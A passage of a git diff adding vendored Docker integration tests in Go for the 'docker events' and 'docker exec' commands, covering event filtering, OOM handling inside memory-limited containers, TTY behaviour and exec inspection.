:= dockerCmdWithResult("events", "--format", "{{badFuncString .}}") + c.Assert(result, icmd.Matches, icmd.Expected{ + Error: "exit status 64", + ExitCode: 64, + Err: "Error parsing format: template: :1: function \"badFuncString\" not defined", + }) +} + +func (s *DockerSuite) TestEventsFormatBadField(c *check.C) { + // make sure it fails immediately, without receiving any event + result := dockerCmdWithResult("events", "--format", "{{.badFieldString}}") + c.Assert(result, icmd.Matches, icmd.Expected{ + Error: "exit status 64", + ExitCode: 64, + Err: "Error parsing format: template: :1:2: executing \"\" at <.badFieldString>: can't evaluate field badFieldString in type *events.Message", + }) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go new file mode 100644 index 0000000000..dc91667116 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go @@ -0,0 +1,486 @@ +// +build !windows + +package main + +import ( + "bufio" + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "strings" + "syscall" + "time" + "unicode" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// #5979 +func (s *DockerSuite) TestEventsRedirectStdout(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "busybox", "true") + + file, err := ioutil.TempFile("", "") + c.Assert(err, checker.IsNil, check.Commentf("could not create temp file")) + defer os.Remove(file.Name()) + + command := fmt.Sprintf("%s events --since=%s --until=%s > %s", dockerBinary, since, daemonUnixTime(c), file.Name()) + _, tty, err := pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty")) + cmd := exec.Command("sh", "-c", command) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Run(), checker.IsNil, check.Commentf("run err for command %q", command)) + + scanner := bufio.NewScanner(file) + for scanner.Scan() { + for _, ch := range scanner.Text() { + c.Assert(unicode.IsControl(ch), checker.False, check.Commentf("found control character %v", []byte(string(ch)))) + } + } + c.Assert(scanner.Err(), checker.IsNil, check.Commentf("Scan err for command %q", command)) + +} + +func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) { + testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport) + + errChan := make(chan error) + go func() { + defer close(errChan) + out, exitCode, _ := dockerCmdWithError("run", "--name", "oomFalse", "-m", "10MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + if expected := 137; exitCode != expected { + errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out) + } + }() + select { + case err := <-errChan: + c.Assert(err, checker.IsNil) + case <-time.After(30 * time.Second): + c.Fatal("Timeout waiting for container to die on OOM") + } + + out, _ := dockerCmd(c, "events", "--since=0", "-f", "container=oomFalse", "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSuffix(out, "\n"), "\n") + nEvents := len(events) + + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + c.Assert(parseEventAction(c, events[nEvents-5]), checker.Equals, "create") + c.Assert(parseEventAction(c, events[nEvents-4]), checker.Equals, "attach") + c.Assert(parseEventAction(c, events[nEvents-3]), checker.Equals, "start") + c.Assert(parseEventAction(c, events[nEvents-2]), checker.Equals, "oom") + c.Assert(parseEventAction(c, events[nEvents-1]), checker.Equals, "die") +} + +func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { + testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport) + + errChan := make(chan error) + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + go func() { + defer close(errChan) + out, exitCode, _ := dockerCmdWithError("run", "--oom-kill-disable=true", "--name", "oomTrue", "-m", "10MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + if expected := 137; exitCode != expected { + errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out) + } + }() + + c.Assert(waitRun("oomTrue"), checker.IsNil) + defer dockerCmd(c, "kill", "oomTrue") + containerID := inspectField(c, "oomTrue", "Id") + + testActions := map[string]chan bool{ + "oom": make(chan bool), + } + + matcher := matchEventLine(containerID, "container", testActions) + processor := processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(20 * time.Second): + observer.CheckEventError(c, containerID, "oom", matcher) + case <-testActions["oom"]: + // ignore, done + case errRun := <-errChan: + if errRun != nil { + c.Fatalf("%v", errRun) + } else { + c.Fatalf("container should be still running but it's not") + } + } + + status := inspectField(c, "oomTrue", "State.Status") + c.Assert(strings.TrimSpace(status), checker.Equals, "running", check.Commentf("container should be still running")) +} + +// #18453 +func (s *DockerSuite) TestEventsContainerFilterByName(c *check.C) { + testRequires(c, DaemonIsLinux) + cOut, _ := dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top") + c1 := strings.TrimSpace(cOut) + waitRun("foo") + cOut, _ = dockerCmd(c, "run", "--name=bar", "-d", "busybox", "top") + c2 := strings.TrimSpace(cOut) + waitRun("bar") + out, _ := dockerCmd(c, "events", "-f", "container=foo", "--since=0", "--until", daemonUnixTime(c)) + c.Assert(out, checker.Contains, c1, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), c2, check.Commentf(out)) +} + +// #18453 +func (s *DockerSuite) TestEventsContainerFilterBeforeCreate(c *check.C) { + testRequires(c, DaemonIsLinux) + buf := &bytes.Buffer{} + cmd := exec.Command(dockerBinary, "events", "-f", "container=foo", "--since=0") + cmd.Stdout = buf + c.Assert(cmd.Start(), check.IsNil) + defer cmd.Wait() + defer cmd.Process.Kill() + + // Sleep for a second to make sure we are testing the case where events are listened before container starts. + time.Sleep(time.Second) + id, _ := dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top") + cID := strings.TrimSpace(id) + for i := 0; ; i++ { + out := buf.String() + if strings.Contains(out, cID) { + break + } + if i > 30 { + c.Fatalf("Missing event of container (foo, %v), got %q", cID, out) + } + time.Sleep(500 * time.Millisecond) + } +} + +func (s *DockerSuite) TestVolumeEvents(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + // Observe create/mount volume actions + dockerCmd(c, "volume", "create", "test-event-volume-local") + dockerCmd(c, "run", "--name", "test-volume-container", "--volume", "test-event-volume-local:/foo", "-d", "busybox", "true") + waitRun("test-volume-container") + + // Observe unmount/destroy volume actions + dockerCmd(c, "rm", "-f", "test-volume-container") + dockerCmd(c, "volume", "rm", "test-event-volume-local") + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterThan, 4) + + volumeEvents := eventActionsByIDAndType(c, events, "test-event-volume-local", "volume") + c.Assert(volumeEvents, checker.HasLen, 4) + c.Assert(volumeEvents[0], checker.Equals, "create") + c.Assert(volumeEvents[1], checker.Equals, "mount") + c.Assert(volumeEvents[2], checker.Equals, "unmount") + c.Assert(volumeEvents[3], checker.Equals, "destroy") +} + +func (s *DockerSuite) TestNetworkEvents(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + // Observe create/connect network actions + dockerCmd(c, "network", "create", "test-event-network-local") + dockerCmd(c, "run", "--name", "test-network-container", "--net", "test-event-network-local", "-d", "busybox", "true") + waitRun("test-network-container") + + // Observe disconnect/destroy network actions + dockerCmd(c, "rm", "-f", "test-network-container") + dockerCmd(c, "network", "rm", "test-event-network-local") + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterThan, 4) + + netEvents := eventActionsByIDAndType(c, events, "test-event-network-local", "network") + c.Assert(netEvents, checker.HasLen, 4) + c.Assert(netEvents[0], checker.Equals, "create") + c.Assert(netEvents[1], checker.Equals, "connect") + c.Assert(netEvents[2], checker.Equals, "disconnect") + c.Assert(netEvents[3], checker.Equals, "destroy") +} + +func (s *DockerSuite) TestEventsContainerWithMultiNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Observe create/connect network actions + dockerCmd(c, "network", "create", "test-event-network-local-1") + dockerCmd(c, "network", "create", "test-event-network-local-2") + dockerCmd(c, "run", "--name", "test-network-container", "--net", "test-event-network-local-1", "-td", "busybox", "sh") + waitRun("test-network-container") + dockerCmd(c, "network", "connect", "test-event-network-local-2", "test-network-container") + + since := daemonUnixTime(c) + + dockerCmd(c, "stop", "-t", "1", "test-network-container") + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "-f", "type=network") + netEvents := strings.Split(strings.TrimSpace(out), "\n") + + // received two network disconnect events + c.Assert(len(netEvents), checker.Equals, 2) + c.Assert(netEvents[0], checker.Contains, "disconnect") + c.Assert(netEvents[1], checker.Contains, "disconnect") + + //both networks appeared in the network event output + c.Assert(out, checker.Contains, "test-event-network-local-1") + c.Assert(out, checker.Contains, "test-event-network-local-2") +} + +func (s *DockerSuite) TestEventsStreaming(c *check.C) { + testRequires(c, DaemonIsLinux) + + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + out, _ := dockerCmd(c, "run", "-d", "busybox:latest", "true") + containerID := strings.TrimSpace(out) + + testActions := map[string]chan bool{ + "create": make(chan bool, 1), + "start": make(chan bool, 1), + "die": make(chan bool, 1), + "destroy": make(chan bool, 1), + } + + matcher := matchEventLine(containerID, "container", testActions) + processor := processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "create", matcher) + case <-testActions["create"]: + // ignore, done + } + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "start", matcher) + case <-testActions["start"]: + // ignore, done + } + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "die", matcher) + case <-testActions["die"]: + // ignore, done + } + + dockerCmd(c, "rm", containerID) + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "destroy", matcher) + case <-testActions["destroy"]: + // ignore, done + } +} + +func (s *DockerSuite) TestEventsImageUntagDelete(c *check.C) { + testRequires(c, DaemonIsLinux) + + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + name := "testimageevents" + imageID, err := buildImage(name, + `FROM scratch + MAINTAINER "docker"`, + true) + c.Assert(err, checker.IsNil) + c.Assert(deleteImages(name), checker.IsNil) + + testActions := map[string]chan bool{ + "untag": make(chan bool, 1), + "delete": make(chan bool, 1), + } + + matcher := matchEventLine(imageID, "image", testActions) + processor := processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, imageID, "untag", matcher) + case <-testActions["untag"]: + // ignore, done + } + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, imageID, "delete", matcher) + case <-testActions["delete"]: + // ignore, done + } +} + +func (s *DockerSuite) TestEventsFilterVolumeAndNetworkType(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + dockerCmd(c, "network", "create", "test-event-network-type") + dockerCmd(c, "volume", "create", "test-event-volume-type") + + out, _ := dockerCmd(c, "events", "--filter", "type=volume", "--filter", "type=network", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterOrEqualThan, 2, check.Commentf(out)) + + networkActions := eventActionsByIDAndType(c, events, "test-event-network-type", "network") + volumeActions := eventActionsByIDAndType(c, events, "test-event-volume-type", "volume") + + c.Assert(volumeActions[0], checker.Equals, "create") + c.Assert(networkActions[0], checker.Equals, "create") +} + +func (s *DockerSuite) TestEventsFilterVolumeID(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + dockerCmd(c, "volume", "create", "test-event-volume-id") + out, _ := dockerCmd(c, "events", "--filter", "volume=test-event-volume-id", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + + c.Assert(events[0], checker.Contains, "test-event-volume-id") + c.Assert(events[0], checker.Contains, "driver=local") +} + +func (s *DockerSuite) TestEventsFilterNetworkID(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + dockerCmd(c, "network", "create", "test-event-network-local") + out, _ := dockerCmd(c, "events", "--filter", "network=test-event-network-local", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + + c.Assert(events[0], checker.Contains, "test-event-network-local") + c.Assert(events[0], checker.Contains, "type=bridge") +} + +func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{"labels":["foo=bar"]}` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + // Get daemon ID + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + daemonID := "" + daemonName := "" + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(line, "ID: ") { + daemonID = strings.TrimPrefix(line, "ID: ") + } else if strings.HasPrefix(line, "Name: ") { + daemonName = strings.TrimPrefix(line, "Name: ") + } + } + c.Assert(daemonID, checker.Not(checker.Equals), "") + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{"max-concurrent-downloads":1,"labels":["bar=foo"], "shutdown-timeout": 10}` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c)) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s (cluster-advertise=, cluster-store=, cluster-store-opts={}, debug=true, default-runtime=runc, insecure-registries=[], labels=[\"bar=foo\"], live-restore=false, max-concurrent-downloads=1, max-concurrent-uploads=5, name=%s, runtimes=runc:{docker-runc []}, shutdown-timeout=10)", daemonID, daemonName)) +} + +func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{"labels":["foo=bar"]}` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + // Get daemon ID + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + daemonID := "" + daemonName := "" + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(line, "ID: ") { + daemonID = strings.TrimPrefix(line, "ID: ") + } else if strings.HasPrefix(line, "Name: ") { + daemonName = strings.TrimPrefix(line, "Name: ") + } + } + c.Assert(daemonID, checker.Not(checker.Equals), "") + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("daemon=%s", daemonID)) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("daemon=%s", daemonName)) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "daemon=foo") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "type=daemon") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "type=container") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), fmt.Sprintf("daemon reload %s", daemonID)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go new file mode 100644 index 0000000000..cac76d96ae --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go @@ -0,0 +1,601 @@ +// +build !test_no_exec + +package main + +import ( + "bufio" + "fmt" + "net/http" + "os" + "os/exec" + "reflect" + "runtime" + "sort" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestExec(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top") + c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) + + out, _ = dockerCmd(c, "exec", "testing", "cat", "/tmp/file") + out = strings.Trim(out, "\r\n") + c.Assert(out, checker.Equals, "test") + +} + +func (s *DockerSuite) TestExecInteractive(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top") + + execCmd := exec.Command(dockerBinary, "exec", "-i", "testing", "sh") + stdin, err := execCmd.StdinPipe() + c.Assert(err, checker.IsNil) + stdout, err := execCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + + err = execCmd.Start() + c.Assert(err, checker.IsNil) + _, err = stdin.Write([]byte("cat /tmp/file\n")) + c.Assert(err, checker.IsNil) + + r := bufio.NewReader(stdout) + line, err := r.ReadString('\n') + c.Assert(err, checker.IsNil) + line = strings.TrimSpace(line) + c.Assert(line, checker.Equals, "test") + err = stdin.Close() + c.Assert(err, checker.IsNil) + errChan := make(chan error) + go func() { + errChan <- execCmd.Wait() + close(errChan) + }() + select { + case err := <-errChan: + c.Assert(err, checker.IsNil) + case <-time.After(1 * time.Second): + c.Fatal("docker exec failed to exit on stdin close") + } + +} + +func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) { + out, _ := runSleepingContainer(c) + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + dockerCmd(c, "restart", cleanedContainerID) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + + out, _ = dockerCmd(c, "exec", cleanedContainerID, "echo", "hello") + outStr := strings.TrimSpace(out) + c.Assert(outStr, checker.Equals, "hello") +} + +func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) { + // TODO Windows CI: Requires a little work to get this ported. + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) + + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top") + c.Assert(err, checker.IsNil, check.Commentf("Could not run top: %s", out)) + + err = s.d.Restart() + c.Assert(err, checker.IsNil, check.Commentf("Could not restart daemon")) + + out, err = s.d.Cmd("start", "top") + c.Assert(err, checker.IsNil, check.Commentf("Could not start top after daemon restart: %s", out)) + + out, err = s.d.Cmd("exec", "top", "echo", "hello") + c.Assert(err, checker.IsNil, check.Commentf("Could not exec on container top: %s", out)) + + outStr := strings.TrimSpace(string(out)) + c.Assert(outStr, checker.Equals, "hello") +} + +// Regression test for #9155, #9044 +func (s *DockerSuite) TestExecEnv(c *check.C) { + // TODO Windows CI: This one is interesting and may just end up being a feature + // difference between Windows and Linux. On Windows, the environment is passed + // into the process that is launched, not into the machine environment. Hence + // a subsequent exec will not have LALA set/ + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "-e", "LALA=value1", "-e", "LALA=value2", "-d", "--name", "testing") + c.Assert(waitRun("testing"), check.IsNil) + + out, _ := dockerCmd(c, "exec", "testing", "env") + c.Assert(out, checker.Not(checker.Contains), "LALA=value1") + c.Assert(out, checker.Contains, "LALA=value2") + c.Assert(out, checker.Contains, "HOME=/root") +} + +func (s *DockerSuite) TestExecSetEnv(c *check.C) { + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "-e", "HOME=/root", "-d", "--name", "testing") + c.Assert(waitRun("testing"), check.IsNil) + + out, _ := dockerCmd(c, "exec", "-e", "HOME=/another", "-e", "ABC=xyz", "testing", "env") + c.Assert(out, checker.Not(checker.Contains), "HOME=/root") + c.Assert(out, checker.Contains, "HOME=/another") + c.Assert(out, checker.Contains, "ABC=xyz") +} + +func (s *DockerSuite) TestExecExitStatus(c *check.C) { + runSleepingContainer(c, "-d", "--name", "top") + + result := icmd.RunCommand(dockerBinary, "exec", "top", "sh", "-c", "exit 23") + c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 23, Error: "exit status 23"}) +} + +func (s *DockerSuite) TestExecPausedContainer(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + + out, _ := runSleepingContainer(c, "-d", "--name", "testing") + ContainerID := strings.TrimSpace(out) + + dockerCmd(c, "pause", "testing") + out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello") + c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new conmmand if it is paused")) + + expected := ContainerID + " is paused, unpause the container before exec" + c.Assert(out, checker.Contains, expected, check.Commentf("container should not exec new command if it is paused")) +} + +// regression test for #9476 +func (s *DockerSuite) TestExecTTYCloseStdin(c *check.C) { + // TODO Windows CI: This requires some work to port to Windows. + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "-it", "--name", "exec_tty_stdin", "busybox") + + cmd := exec.Command(dockerBinary, "exec", "-i", "exec_tty_stdin", "cat") + stdinRw, err := cmd.StdinPipe() + c.Assert(err, checker.IsNil) + + stdinRw.Write([]byte("test")) + stdinRw.Close() + + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, _ = dockerCmd(c, "top", "exec_tty_stdin") + outArr := strings.Split(out, "\n") + c.Assert(len(outArr), checker.LessOrEqualThan, 3, check.Commentf("exec process left running")) + c.Assert(out, checker.Not(checker.Contains), "nsenter-exec") +} + +func (s *DockerSuite) TestExecTTYWithoutStdin(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + errChan := make(chan error) + go func() { + defer close(errChan) + + cmd := exec.Command(dockerBinary, "exec", "-ti", id, "true") + if _, err := cmd.StdinPipe(); err != nil { + errChan <- err + return + } + + expected := "the input device is not a TTY" + if runtime.GOOS == "windows" { + expected += ". If you are using mintty, try prefixing the command with 'winpty'" + } + if out, _, err := runCommandWithOutput(cmd); err == nil { + errChan <- fmt.Errorf("exec should have failed") + return + } else if !strings.Contains(out, expected) { + errChan <- fmt.Errorf("exec failed with error %q: expected %q", out, expected) + return + } + }() + + select { + case err := <-errChan: + c.Assert(err, check.IsNil) + case <-time.After(3 * time.Second): + c.Fatal("exec is running but should have failed") + } +} + +func (s *DockerSuite) TestExecParseError(c *check.C) { + // TODO Windows CI: Requires some extra work. Consider copying the + // runSleepingContainer helper to have an exec version. + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top") + + // Test normal (non-detached) case first + cmd := exec.Command(dockerBinary, "exec", "top") + _, stderr, _, err := runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(stderr, checker.Contains, "See 'docker exec --help'") +} + +func (s *DockerSuite) TestExecStopNotHanging(c *check.C) { + // TODO Windows CI: Requires some extra work. Consider copying the + // runSleepingContainer helper to have an exec version. + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top") + + err := exec.Command(dockerBinary, "exec", "testing", "top").Start() + c.Assert(err, checker.IsNil) + + type dstop struct { + out []byte + err error + } + + ch := make(chan dstop) + go func() { + out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput() + ch <- dstop{out, err} + close(ch) + }() + select { + case <-time.After(3 * time.Second): + c.Fatal("Container stop timed out") + case s := <-ch: + c.Assert(s.err, check.IsNil) + } +} + +func (s *DockerSuite) TestExecCgroup(c *check.C) { + // Not applicable on Windows - using Linux specific functionality + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top") + + out, _ := dockerCmd(c, "exec", "testing", "cat", "/proc/1/cgroup") + containerCgroups := sort.StringSlice(strings.Split(out, "\n")) + + var wg sync.WaitGroup + var mu sync.Mutex + execCgroups := []sort.StringSlice{} + errChan := make(chan error) + // exec a few times concurrently to get consistent failure + for i := 0; i < 5; i++ { + wg.Add(1) + go func() { + out, _, err := dockerCmdWithError("exec", "testing", "cat", "/proc/self/cgroup") + if err != nil { + errChan <- err + return + } + cg := sort.StringSlice(strings.Split(out, "\n")) + + mu.Lock() + execCgroups = append(execCgroups, cg) + mu.Unlock() + wg.Done() + }() + } + wg.Wait() + close(errChan) + + for err := range errChan { + c.Assert(err, checker.IsNil) + } + + for _, cg := range execCgroups { + if !reflect.DeepEqual(cg, containerCgroups) { + fmt.Println("exec cgroups:") + for _, name := range cg { + fmt.Printf(" %s\n", name) + } + + fmt.Println("container cgroups:") + for _, name := range containerCgroups { + fmt.Printf(" %s\n", name) + } + c.Fatal("cgroups mismatched") + } + } +} + +func (s *DockerSuite) TestExecInspectID(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + id := strings.TrimSuffix(out, "\n") + + out = inspectField(c, id, "ExecIDs") + c.Assert(out, checker.Equals, "[]", check.Commentf("ExecIDs should be empty, got: %s", out)) + + // Start an exec, have it block waiting so we can do some checking + cmd := exec.Command(dockerBinary, "exec", id, "sh", "-c", + "while ! test -e /execid1; do sleep 1; done") + + err := cmd.Start() + c.Assert(err, checker.IsNil, check.Commentf("failed to start the exec cmd")) + + // Give the exec 10 chances/seconds to start then give up and stop the test + tries := 10 + for i := 0; i < tries; i++ { + // Since its still running we should see exec as part of the container + out = strings.TrimSpace(inspectField(c, id, "ExecIDs")) + + if out != "[]" && out != "" { + break + } + c.Assert(i+1, checker.Not(checker.Equals), tries, check.Commentf("ExecIDs still empty after 10 second")) + time.Sleep(1 * time.Second) + } + + // Save execID for later + execID, err := inspectFilter(id, "index .ExecIDs 0") + c.Assert(err, checker.IsNil, check.Commentf("failed to get the exec id")) + + // End the exec by creating the missing file + err = exec.Command(dockerBinary, "exec", id, + "sh", "-c", "touch /execid1").Run() + + c.Assert(err, checker.IsNil, check.Commentf("failed to run the 2nd exec cmd")) + + // Wait for 1st exec to complete + cmd.Wait() + + // Give the exec 10 chances/seconds to stop then give up and stop the test + for i := 0; i < tries; i++ { + // Since its still running we should see exec as part of the container + out = strings.TrimSpace(inspectField(c, id, "ExecIDs")) + + if out == "[]" { + break + } + c.Assert(i+1, checker.Not(checker.Equals), tries, check.Commentf("ExecIDs still not empty after 10 second")) + time.Sleep(1 * time.Second) + } + + // But we should still be able to query the execID + sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil) + c.Assert(sc, checker.Equals, http.StatusOK, check.Commentf("received status != 200 OK: %d\n%s", sc, body)) + + // Now delete the container and then an 'inspect' on the exec should + // result in a 404 (not 'container not running') + out, ec := dockerCmd(c, "rm", "-f", id) + c.Assert(ec, checker.Equals, 0, check.Commentf("error removing container: %s", out)) + sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil) + c.Assert(sc, checker.Equals, http.StatusNotFound, check.Commentf("received status != 404: %d\n%s", sc, body)) +} + +func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) { + // Problematic on Windows as Windows does not support links + testRequires(c, DaemonIsLinux) + var out string + out, _ = dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + idA := strings.TrimSpace(out) + c.Assert(idA, checker.Not(checker.Equals), "", check.Commentf("%s, id should not be nil", out)) + out, _ = dockerCmd(c, "run", "-d", "--link", "container1:alias1", "--name", "container2", "busybox", "top") + idB := strings.TrimSpace(out) + c.Assert(idB, checker.Not(checker.Equals), "", check.Commentf("%s, id should not be nil", out)) + + dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1") + dockerCmd(c, "rename", "container1", "container_new") + dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1") +} + +func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) { + // Not applicable on Windows to Windows CI. + testRequires(c, SameHostDaemon, DaemonIsLinux) + for _, fn := range []string{"resolv.conf", "hosts"} { + deleteAllContainers() + + content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn))) + c.Assert(err, checker.IsNil) + + c.Assert(strings.TrimSpace(string(content)), checker.Equals, "success", check.Commentf("Content was not what was modified in the container", string(content))) + + out, _ := dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top") + contID := strings.TrimSpace(out) + netFilePath := containerStorageFile(contID, fn) + + f, err 